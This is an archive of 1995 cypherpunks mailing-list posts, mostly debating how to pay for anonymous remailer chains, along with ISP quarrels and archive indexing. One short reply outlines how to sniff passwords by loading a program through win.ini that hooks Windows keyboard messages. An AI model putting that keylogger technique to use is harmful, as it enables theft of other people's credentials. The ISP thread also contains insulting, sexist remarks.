> won't _every_ remailer in the chain need to know your FV billing account?
> How would the rest of them charge via FV without knowing your billing
> account?  What Russell was suggesting (I think), was that only the first
> would bill via FV directly, so only the first would need to know your
> billing account, and then he'd settle up with the others at the end of the
> month. (A particular variation of that scheme is what you mentioned later
> in your message, and I'll get to that).

The latter is what I was proposing.  Only the first one would charge via
FV, but the other ones would form a "closed system" that you could only
get into by going through one that charged.

> But assuming that every remailer along the chain _was_ charging via FV, I
> fail to see how only the last one would need your billing account; seems to
> me they all would, and thus any one could collude with FV to violate your
> anonimity.

That's not my assumption.  I think you may have misread my mail -- I
*agree* with you on this point.  Sorry if I was unclear!

> The
> remailer operators still have to have an organization and remain in close
> contact, which I am uncomfortable with because it seems to make collusion
> more likely. 

As I said, it all depends on your level of paranoia....  I tend to think
that in such an organization, where the primary "product" is privacy,
each member would tend to watch all the other members like hawks, eager
to publicize any instance of the other guy not being sufficiently
zealous in protecting privacy.  (Of course, I'm assuming that people
like *you* will be running these services, i.e. people even more
paranoid about privacy than me.)

> And it's still dificult to intermix for-pay and free remailers
> within your chain, or even just for-pay remailers from several different
> consortiums. 

I think this is wrong.  In my model, each consortium model has two, a
for-pay and a for-free.  Anyone can send to a for-pay, but only a
consortium remailer can send to a for-free.  Not that complicated,
really.

>  [The
> consortium, as far as I can tell, would also find it rather dificult to
> charge more for a longer chain, I can't think of any way for them to charge
> anything excpet a uniform amount regardless of length of chain, unless you
> give the first remailer a way to tell the length of your chain, which is
> undesirable. I'm not sure if this is a problem.]

To my mind, that's not a bug, it's a feature.  The consortium is
charging you a set fee for privacy, and you get to decide how many hops
are required to have a level of privacy you trust.

> And this level of paranoia would be perfectly well surved by a Julf/penet
> style remailer, which _would_ work well with an FV-payment system, as I
> agreed before.  The cypherpunks chained remailernet system as a whole is
> overkill for your paranoia needs, but appearantly not for the needs of
> those who use it over Julf's.  It appears to me, that an FV-style payment
> scheme can't be added to the cypherpunks chained remailer system without
> dropping it's security to the level of Julf's.  Which might be good enough
> for you, but not good enough for me, or presumably for anyone else that
> uses cypherpunks remailers.

This is true of the scheme that I said I would be satisfied with (one
remailer + FV), but not true, I think, of the "overkill" scheme, which
was the consortium.

> [Do you understand how cypherpunks remailers work, and the difference
> between them and a julf/penet style remailer?   Do you understand how
> encryption is used in a cypherpunks-style remailer chain to make it so each
> individual remailer only knows the next remailer along the chain, and not
> the entire rest of the chain?]

Well, I *think* I do, though I may be suffering from a bit of
dilletantism here -- I'm certainly no expert in cryptography, but I
think I understand the concepts involved.  We haven't even gotten into
the effect of encryption yet -- so far, we've just been talking, I
thought, about untraceability.  But as far as I can see, there's no
reason that the consortium pay-only-at-entry scheme couldn't work with
encrypted remailers.  Am I confused?  Couldn't you use the same
cryptographic chain as is currently used, where all the inner entries in
the chain are free crypto-remailers open only to other consortium
remailers, but in which the outer encrypted message had the FV payment
attached, which gained it entry to the remailer pool?

> Try to bring up objections to a digicash-style system that are applicable
> to remailers.   I agree that they are different technologies that fill
> different requirements, but it seems to me that the particular requirements
> of a remailer system are only met by a digicash/magic money style
> technology.

Again, I think you mis-read me.  I haven't (nor do I care to) spent a
lot of time thinking about how to do remailers at all, let alone with
digicash.  What I was referring to was the basic objections that come
from using a digital cash scheme in the first place.

>  I think  an electronic cash system that will work with remailers, must
> satisfy these things:
> 1) You need to be able to enclose the "signifyer" of the transaction inside
> encryption.  Whether the "signifyer" is the cash itself, or an agreement to
> make a transaction together with a billing number, or whatever, you need to
> be able to enclose it in a PGP (or other arbitrary PKE protocol) encrypted
> block.
> 2) The "signifyer" of the transaction (which again might theoretically be
> the cash itself, or some kind of billing number) alone shouldn't be enough
> to reveal the identity of the anonymous user.

I agree that FV doesn't meet the above requirements, but I don't see why
they're necessary for remailers.  In the consortium scheme I'd proposed,
the only thing that could ever be proven about you would be that you had
used a remailer.  Now, if the message was not encrypted, your anonymity
could be broken by collusion of FV and the "entry" remailer.  But if the
cypherpunks style cryptographic chain was used, i.e. if the contents
(including an inner envelope that said who you really sent it to) were
encrypted, nothing more would ever be derivable without the collusion of
everyone in the chain, and even then it would only be derivable if
certain records were kept.  

All I'm claiming is that it's do-able using the FV payment system.  I'm
not going to do it myself because I don't personally feel that this
level of untraceability is EVER legitimately necessary.....  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Fri, 6 Jan 95 14:33:37 PST
To: cypherpunks@toad.com
Subject: Re: public vs. private replies
Message-ID: <199501062238.RAA29242@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501060807.DAA22166@bb.hks.net>,
L. McCarthy <lmccarth@ducie.cs.umass.edu> wrote:
>Tim May writes:
>> In my opinion, having personal access
>> to past posts is several orders of magnitude more important than
>> having MIDI-MIME JPEG-II TeX players [...]
>
>It takes more disk space from one's personal quota, though (for those who
>suffer under such restrictions). :[

All posts to cypherpunks since June '94 are available by ftp from
ftp.hks.net:/cypherpunks/nntp/cypherpunks.   They are also available
via nntp from nntp.hks.net:hks.lists.cypherpunks.

I'd be glad to put a search engine of some sort on them, either by
Web or by mailserver, if someone can suggest a reasonable way to index
the whole lot.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLw2LTRNhgovrPB7dAQEDNwP/QTydu0Tp68ytNupes18WU+uv159GJJfE
Wy+3iLxj+9rbPJwEKBZlXqhkfV7pf4nK9wNwiwNR4ZF13zpCAljWPhw3BEgNM4Xj
Ity2GWLb8s7PBMplc+ggTQ4LowMYGqoO/e1pBWH3joFCuv11owkf+ZmbvTSZgU7h
l07wq41l2L0=
=Ao+S
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw3GJCoZzwIn1bdtAQFdVAF8DB7xxjzPgHNj2Eil0zEuLKj8SofCLFAs
HBdXBN2fFjT5mNwnKh5a4T1R1Dv0Zp/c
=6bFr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 6 Jan 95 14:45:36 PST
To: Jonathan Rochkind <jamesd@netcom.com>
Subject: Re: for-pay remailers and FV (Was Re: Remailer Abuse)
In-Reply-To: <4715.789430801.1@nsb.fv.com>
Message-ID: <oj3QO_30Eyt58xICEo@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from fv: 6-Jan-95 Re: for-pay remailers and F.. "James A.
Donald"@netcom (1127*)

> On Fri, 6 Jan 1995, Jonathan Rochkind wrote:

> > Hmm. Maybe I don't completely understand how this is going to work, but
> > won't _every_ remailer in the chain need to know your FV billing account?

> First remailer knows you and your FV billing account.  Charges you
> its own fee and the fee for all for profit remailers in the list.
> (The envelope states what this fee is going to be) 

> Second remailer charges first remailer.

> Third remailer charges second remailer.

> If the postage on the envelope is insufficient to cover all
> the for profit remailers the message passes through, it gets
> bounced or dropped.

> In principle it could work, 

Yes, I think you've probably just identified a *second* way it could
work.  I agree it's awfully complex, though.  I'd prefer my consortium
approach, but it's nice to see that multiple models are possible. --
Nathaniel







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 14:40:13 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <199501062245.RAA29327@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 5:10 PM 01/06/95, Dr. D.C. Williams wrote:
[suggestion that only the first remailer would get payed, with
justification for that.]
>Operators with the best net. reputations and those whose remailers are
>especially full featured or prompt will likely receive more use as
>"entry" remailers; this is good capitalism which should not only increase
>their number but improve the state of remailers in general. If someone
>wants to establish a remailer that will join the existing mesh of remailers,
>it will have to accept messages from others gratis if it wants such access
>to the rest of them. Its compensation would be derived from initial traffic.

Yeah, that does seem possible.
One thing to keep in mind, though, is that it's really the _last_ remailer
in the chain that's taking the most heat, and it would be nice if they got
payed.  There's also an issue of some remailers refusing to be last in the
chain, so they dont' expose themselves so much. So the remailers which
_did_ agree to be last in the chain would obviously get used for this
purpose, while the others wouldn't, but they wouldn't get any more money
for it. They might even get less, since most people probably don't use the
same remailer twice in a chain, so the ones agreeing to be last are hardly
ever going to be first.   That seems undesirable.

Ideally, the forces of capitalism would work on the last remailer on the
chain, rather then (or in addition to) the first, to increase the number of
remailers willing to do this.  All this goes triple for mail-to-news
remailers, since that poses even more exposure to heat, and it would be
nice if ops were conpensated for.


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw3H8yoZzwIn1bdtAQHFWwGAqDhDUgU4+I4wLsqR8AwHEm09E9lqVjCX
IcKjz280k1pK3MLaOMTCueXVUaZCam6u
=4Wi5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 6 Jan 95 18:12:40 PST
To: Mike Duvos <mpd@netcom.com>
Subject: Re: Files and mail
In-Reply-To: <199501070010.QAA02210@netcom10.netcom.com>
Message-ID: <Pine.3.89.9501061751.A12229-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Mike Duvos wrote:
> 
> drechsau@winternet.com (Mike Horwath) carefully explains all the
> reasons why is it better to have a Netcom account than a
> Winternet account!
> 
>  > I was going to be in, I decided to rest instead.  So sue me
>  > for it.

(Long hilarious list of Mike Horwaths's totally unprofessional
behavior deleted  To save bandwidth, just read it twice, or
better still three times.)

> [Netcom] accounts don't vanish when "the guy who owns the
> machine" decides to throw a tantrum.
> 
> [...]
> 

A big problem with Netcom is it that it has no web server,
and its ftp server is totally overwhelmed.

I use nw.com for my web pages and netcom for everything else.

Big bandwidth webservice at reasonable rates

Does anyone have a better suggestion?  I have been shopping
around for a reasonably priced 28KB SLIP connection.  Have
not found one yet.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 6 Jan 95 15:10:09 PST
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: floating point crypto?
Message-ID: <v01510105ab333d693cc6@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:51 PM 1/5/95, Timothy C. May wrote:
>Robert H. has asked that we reply in e-mail to him, to avoid
>"cluttering the list more than I already have...," but the logic of
>this is faulty. The few lines of a response such as this one, or even
>of several such responses, are as nothing compared to dozens or more
>people sifting their own archives so they can each independently send
>Robert what they find. Hence my public reply.

Got that right. No one can be more chagrined than I about this, because
I've seen it happen. I remember Way Back in Ancient History (1985) when
someone who couldn't remember the name of the movie posted the plot to
"Slient Running" to net.sf(?), and asked for e-mail answers, so it
"wouldn't clog the newsgroup". He was begging for mercy as little as 4
hours later... How soon they forget. I'm lucky it didn't happen to me.
Thanks Tim, for saving my bacon.

Nonetheless, I *am* thankful to Jim Gillogly, who sent me a great bunch of
stuff about what the pentium.whistleblower, Dr. Nicely, was working on. Jim
said he got it out of WWW, and maybe he'll post the URL here and that will
be that. Nicely was working with finding multiple primes: Prime twins,
prime triplets, etc.

I will now proceed to post the relevant bits of Jim's and Tim's stuff to
the newsgroup I got "called" in. Thanks to everyone who sent me comments,
pointers, etc.

>Not to sound strident, but if folks would keep copies of articles and
>spend some time organizing them in data bases or in other searchable
>forms, this would help the list. In my opinion, having personal access
>to past posts is several orders of magnitude more important than
>having MIDI-MIME JPEG-II TeX players that can display "Cypherpunks R
>Us" in the correct font and with the "R" reversed according to spec.

Indeed.

Having limited space on my poor PowerBook, I have kept mostly the "excrable
e$" types of files, to wit: anything mentioning money, finance, economics,
and whatever crypto is specific to those areas.

Since I started hanging out here this spring, I've accumulated about 10
megs of stuff between this list and www-buyinfo. I just archived everything
from November backwards into Stuffit-compressed Eudora mailboxes. If you
want those, I've got 'em. I did search the files I have after the "great
squeeze", but to no avail. Unfortunately, I did not think I would have to
keep anything to do with WIntel and their potential tribulations. I am,
after all a Certified Macintosh Bigot.

Thanks again, everyone.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Fri, 6 Jan 95 15:19:20 PST
To: cypherpunks@toad.com
Subject: Re: sniff passwords on PC (DOS)
Message-ID: <9501062310.AB20311@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:00 AM 1/6/95 CST, m00012@KANGA.STCLOUD.MSUS.EDU wrote:
> ... It does not work after starting windows.  Not sure, but it seems obvious
>that MS windows installs it's own keyboard interrupt. ...

True, but it's fairly simple to write a program that loads itselfs in 
win.ini and also hooks the keyboard messages from Windows.


    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 6 Jan 95 18:12:43 PST
To: cypherpunks@toad.com
Subject: Re: Files and mail
In-Reply-To: <Pine.3.89.9501061945.A12905-0100000@mindvox>
Message-ID: <199501070212.SAA19162@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"I'm Wozz" <wozzeck@phantom.com> writes:

[miscellaneous Netcom-honking elided]

 > It just so happens the AUP of winternet allows for this
 > situation.

Right.  And a small service provider can make any "terms of
service agreement" his or her little heart desires.  Just like
the owner of a two line BBS.  With big service providers, such
things tend to be done in a somewhat more business-like fashion.

 > its a bit far fetched to call HIS reaction a tantrum.... If
 > anyone's screaming for mommy its whats-her-name....

Well, if I posted a message to 10 newsgroups and some bozo posted
a message to a.c-e.n-a falsely implying that it was the beginning
of some sort of massive spam, I would certainly not be pleased.
If Netcom, after receiving some small amount of flamage on the
subject, summarily removed access to my account and made
themselves unavailable for several days when I tried to contact
them to discuss the matter, and then tossed me off with a
flippant "so sue me" when I protested, I would be even less
pleased.  Fortunately, I can't imagine Netcom even caring about a
10 newsgroup cross-post.

 > big is better i guess....

In the case of Internet Service Providers, big is definitely
better.  There are simply economies of scale which are not
realized with smaller operations.  Netcom has had some problems,
but almost all of them were growth related.  None of them were
intrinsic to the systems and network itself.

 > Winternet is HARDLY a 'bbs'.  Its a regional internet
 > service....much as netcom was before they flooded every
 > city with dialups.

Read again, this time for comprehension.  I did not say Winternet
was a BBS.  Merely that smaller ISPs have many of the undesirable
characteristics found in BBS systems.

 > Any professional knows better than to read private
 > mail...and if this is so...then they aren't worthy of having
 > a site to run

For legal purposes, most BBS systems declare that for the
purposes of the ECPA, there is no such thing as private mail on
their system.  The Sysop is then free to read anything he wishes
to.  This policy is clearly stated in the user agreements of
almost all BBS systems offering access to the public.

 > as for PGP, this is an individual thing....I'm sure mike
 > has no such objections...i know here at MindVox we
 > don't...in fact, we installed it for the users

Many BBS Sysops forbid PGP and kick users off their systems who
use it.  They cite fears of encrypted illegal porn and credit
card numbers passing through their systems, and potential legal
liability.

 > Netcom is an abomination.....it is the only one of its kind
 > (not counting delphi etc, since they were conceived under
 > differnent systems)

Netcom is the fastest growing and leading Internet Service
Provider.  Their ability to attract new customers is limited only
by the rate at which they are able to increase capacity.  Their
respect for freedom of expression is absolute and they do not
meddle in their customers' affairs.  Their prices are reasonable
and their user agreement is fair.  Works for me. :)

 > They suck network services off others (irc as one example)
 > and don't take responsibilty for the HUGE number of idiots
 > on their service who maliciously hack anything they can
 > reach....its totally without personality...AND....its slower
 > than molasses...the management is out of touch with the
 > users and they are so overloaded with trouble reports, they
 > don't know what to do with them.

Perhaps an exaggerated description of Netcom a few months ago,
but certainly not the current state of affairs.  I always get a
line when I dial in, response time is reasonable, disk is
abundant, and almost all software is available.  Speed of network
connections to other sites is quite acceptable.

 > This has got to be one of the largest loads of crap I've
 > seen tossed on this list in the year and a half i've lurked
 > on it.

Everyone is certainly entitled to an opinion, which, in the words
of Robert Blake, is one of the two things all humans have. :)

 > oh...btw...i don't have ANY connection to winternet, other
 > than knowing MANY satisfied customers, and having heard
 > alot about them, as a sysadmin for a site in much the same
 > situation.

The number of satisfied customers is not the measure of a site,
any more than the number of people still alive is the measure of
a disease.

Netcom works with the reliability of the phone company.  It is
always there, almost always up, and is redundant enough that when
something breaks, it is still usable.  I pay my $19.50 a month
and I get unlimited everything.  I'm happy.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Tengi" <tengi@Princeton.EDU>
Date: Fri, 6 Jan 95 15:23:33 PST
To: cactus@seabsd.hks.net (L. Todd Masco)
Subject: Indexing and searching (was Re: public vs. private replies)
In-Reply-To: <199501062238.RAA29242@bb.hks.net>
Message-ID: <9501062315.AA29835@deepthought.Princeton.EDU>
MIME-Version: 1.0
Content-Type: text/plain


You may want to take a look at glimpse and harvest.  Here are some useful URLs 
for them:

http://glimpse.cs.arizona.edu:1994/

http://harvest.cs.colorado.edu/

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> - -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <199501060807.DAA22166@bb.hks.net>,
> L. McCarthy <lmccarth@ducie.cs.umass.edu> wrote:
> >Tim May writes:
> >> In my opinion, having personal access
> >> to past posts is several orders of magnitude more important than
> >> having MIDI-MIME JPEG-II TeX players [...]
> >
> >It takes more disk space from one's personal quota, though (for those who
> >suffer under such restrictions). :[
> 
> All posts to cypherpunks since June '94 are available by ftp from
> ftp.hks.net:/cypherpunks/nntp/cypherpunks.   They are also available
> via nntp from nntp.hks.net:hks.lists.cypherpunks.
> 
> I'd be glad to put a search engine of some sort on them, either by
> Web or by mailserver, if someone can suggest a reasonable way to index
> the whole lot.
> - - --
> Todd Masco     | "life without caution/ the only worth living / love for a man/
> cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
> Cactus' Homepage
> 
> - -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBLw2LTRNhgovrPB7dAQEDNwP/QTydu0Tp68ytNupes18WU+uv159GJJfE
> Wy+3iLxj+9rbPJwEKBZlXqhkfV7pf4nK9wNwiwNR4ZF13zpCAljWPhw3BEgNM4Xj
> Ity2GWLb8s7PBMplc+ggTQ4LowMYGqoO/e1pBWH3joFCuv11owkf+ZmbvTSZgU7h
> l07wq41l2L0=
> =Ao+S
> - -----END PGP SIGNATURE-----
> - ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Gratis auto-signing service
> 
> iQBFAwUBLw3GJCoZzwIn1bdtAQFdVAF8DB7xxjzPgHNj2Eil0zEuLKj8SofCLFAs
> HBdXBN2fFjT5mNwnKh5a4T1R1Dv0Zp/c
> =6bFr
> -----END PGP SIGNATURE-----
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@python.ee.unr.edu>
Date: Fri, 6 Jan 95 15:19:15 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <199501062324.SAA29816@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Jonathan replied:

> One thing to keep in mind, though, is that it's really the _last_ remailer
> in the chain that's taking the most heat, and it would be nice if they got
> payed.

Unfortunately, this creates the closest association between specific
traffic and paying customers.

>  There's also an issue of some remailers refusing to be last in the
> chain, so they dont' expose themselves so much. So the remailers which
> _did_ agree to be last in the chain would obviously get used for this
> purpose, while the others wouldn't, but they wouldn't get any more money
> for it.

What's to prevent mail from remailer A sent to remailer B from being
sent right back to A for delivery? That's a part of the mixing required
for true randomness. I don't know if this is being done now (by Chain or
premail), and I'd like to know why. There might well be a good reason I'm
not aware of. In order to join the mesh, remailers would be required
to accept and ultimately deliver mail to ensure equality among them.

I believe that a class of "prime" remailers would arise; these would be
the preferred remailers, and their input and output would largely be
balanced. This assumes, of course, that "second-class" remailers (those
which profit equally but don't deliver as the last unit in the chain)
aren't allowed in on a equal basis. Prime operators deserve, and would
receive, compensation.

> They might even get less, since most people probably don't use the
> same remailer twice in a chain, so the ones agreeing to be last are hardly
> ever going to be first.   That seems undesirable.

See above. What's the difference between A-->B-->C-->B and A-->B-->C-->D ?
If someone is logging messages and routing, it's less secure, but then so is
the entire remailer system. Prime remailer operators are those who don't
log.

Maybe message size would tip off snoopers. This can be overcome with minor
tweaking to existing remailer code by tacking on or or eliminating padding
to messages. But logging still makes the whole system extremely vulnerable.

> remailers, since that poses even more exposure to heat, and it would be
> nice if ops were conpensated for.

Agreed. But since the payment "on the way out" (i.e.; a store) is much
less desirable (and would probably work to reduce traffic), payment "on the 
way in" (i.e.; the subway) seems like the preferred alternative.

=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw3RLCoZzwIn1bdtAQHpYgF/brIk7ssBTsR+26TqW6MifGwz+lymbXlc
cYWFzNCJcrbRTgy7zHgPisvk/roHW0Nv
=XJAq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 6 Jan 95 18:26:04 PST
To: "I'm Wozz" <wozzeck@phantom.com>
Subject: Re: Files and mail
In-Reply-To: <Pine.3.89.9501061945.A12905-0100000@mindvox>
Message-ID: <Pine.3.89.9501061827.A22477-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, I'm Wozz wrote:
> > 
> > Big providers like Netcom have many employees and many machines.
> > Things do not screech to a halt when "the guy who owns the
> > machine" takes a mental health day. :)
> > 
> 
> no instead things screech to a halt when the 1000th user gets on each 
> client machine

When Netcom slows down, this is not because the asshole in charge
is being an asshole.

He may well be an asshole, but the size of netcom protects
me from having to discover this.

This is good for my mental health.  

> 
> I'd love to see a response to this...please!

You are totally full of shit.

Mike Horwath was arrogant and unprofessional.  

The problems you describe with Netcoms service are entirely
accurate.  I am looking for better solution. Submitting to 
the authority of an arrogant and incompetent fool does not
seem like a good solution.

He is plainly a fool, because if I had acted as he has acted,
I would certainly not post this all over the place.

Until he posted, I had assumed that Carol was having a hissy fit,
that she was premenstrual or something.

Now I see why she is upset. 

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Fri, 6 Jan 95 15:37:15 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <9501062326.AA20655@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:44 PM 1/6/95 -0500, Jonathan Rochkind wrote:
> ... Why?  Why wouldn't the FV remailers use settlements?  At the end of
>>the month, everyone settles accounts in re who gets what fraction of
>>what.  No logs are needed other than counters.
>
> ... 1) The initial remailer has no way of knowing how many subsequent links
>there are in the chain, and so doesn't know if I've paid him enough to
>reimburse everyone else.  I can easily cheat. He also doesn't know _who_
>the subsequent chains are. He can deduct one "stamp" from the amount, and
>forward the rest on to the next remailer, and trust them to do the same,
>but if I'm cheating there won't be enough to make it to the end of the
>chain.  Both of these facts (initial op doens't know how long the chain
>will be, or who will be on it) are essential to the security I get from
>using anon remailers, so even if they could be "fixed", it would be bad to.

No, basically the idea is that each stamp covers an average number of 
remailer hops.  The remailer ops get together, with counts of their ins and 
outs to each other, and split some fraction of the stamp prices accordingly. 
 They can even determine the average number of hops given the in/out counts. 
 Fairly simple, actually.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 6 Jan 95 18:31:50 PST
To: cypherpunks@toad.com
Subject: Re: for-pay remailers and FV
In-Reply-To: <wj3QKlz0Eyt5AxIAJg@nsb.fv.com>
Message-ID: <199501070231.SAA20999@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


This whole fracas between blind-sig money and FV money is a symptom of
the confusion between clearing and settlement.

Roughly speaking, clearing is when authorization moves (i.e. a
liability is created), and settlement is when money moves (i.e. when
that liability is discharged).  Clearing should always happen at or
before settlement.  In order to do on-line digital postage, you need
clearing to happen at the point of remailing.  Settlement can happen
at some later time.

Settlement need not be in real money.  The liability of other
settlement facilities can be used.  This is in fact how central
banking works.  Only the central bank moves "actual" funds; everyone
else moves liabilities around.

To wit, a remailer consortium would do best to issue a local banknote
usable only by themselves and have customers settle with the
consortium issuer, rather than any member of the consortium itself.
If the consortium issuer were to use blind sigs, the consortium
members wouldn't be able to ascertain who paid.

The mechanism for settlement could be credit cards directly, mailed in
checks, even FV.  The preferences of the consortium members for issues
of timeliness of settlement, reversibility, loss sharing, etc. would
decide the actual choice of settlement mechanism.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 6 Jan 95 18:44:27 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: for-pay remailers and FV
In-Reply-To: <199501070231.SAA20999@largo.remailer.net>
Message-ID: <Pine.3.89.9501061816.A25172-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Eric Hughes wrote:
> This whole fracas between blind-sig money and FV money is a symptom of
> the confusion between clearing and settlement.

It is nothing to do with that confusion.

> To wit, a remailer consortium would do best to issue a local banknote
> usable only by themselves and have customers settle with the
> consortium issuer, rather than any member of the consortium itself.
> If the consortium issuer were to use blind sigs, the consortium
> members wouldn't be able to ascertain who paid.

If they could use blind sigs they would not need a consortium.

The customer would just put the postage inside the envelope, and
each for-pay remailer would just peel of an envelope layer,
and use the postage that the user provided for it.

Chaumian money solves the problems we are discussing.

The problem that we are discussing is how to solve them 
without using Chaumian money.


 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 6 Jan 95 19:12:01 PST
To: tcmay@netcom.com
Subject: A Fire Upon the Deep
Message-ID: <Pine.SUN.3.91.950106190639.16522B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199501052231.OAA11745@netcom5.netcom.com>, tcmay@netcom.com 
(Timothy C. May) says:
>Finally, his Hugo-winning novel, "A Fire Upon the Deep," has some
>casual mentions of crypto, including the odd speculation that those in
>the know in the distant future don't really trust public key crypto.
 
This is quite sensible given that in the Zone universe, you may have no
idea how much computing power your enemies have, so no cryptography
that is only computationally secure can really be trusted.
 
_A Fire Upon the Deep_ also describes how anarchy might work on a
galactic scale.  For example, Vinge seems to think that arbitration
organizations would be very important in such an anarchy and would
acquire military characteristics.  Issues of trust and reputation
are also treated implicitly.
 
There was some recent talk about network agent technology on this list.
Vinge mentions almost in passing how an entire planet (or maybe planets)
was taken over by an "intelligent net packet".  Makes me rather nervous
about things like Magic Cap...
 
One more thing that's marginally related to cypherpunks (hey I really
like this book so I'll take any chance I can to talk about it ;-) is
the idea that the efficiency of distributed computation (and distributed 
intelligence) depends on high bandwidth and low latency of the communication
medium.  Since anonymity seems to have rather high costs in terms of
bandwidth and latency (compare anonymous e-mail with internet video
conferencing or even with normal e-mail), this implies that
an organization of anonymous agents will not work as efficiently as
a similar orginzation whose members are not concerned about
anonymity.
 
Wei Dai
PGP encrypted mail welcome.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Fri, 6 Jan 95 16:47:38 PST
To: cypherpunks@toad.com
Subject: Peter D. Lewis
Message-ID: <199501070053.TAA00768@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Culled from a columbia newsgroup:

>WIRED magazine now has a "Peter Lewis Prize for Bad Internet
>Reporting".  Check out: http://www.hotwired.com/Signal/Flux/ where
>they announce the prize each week.  Also read the story how Reuters
>muffed up the Microsoft/Catholic Church reporting.

You know it's bad when WIRED accuses you of bad reporting.
- --
Todd Masco     | "life without caution/ the only worth living / love for a man/
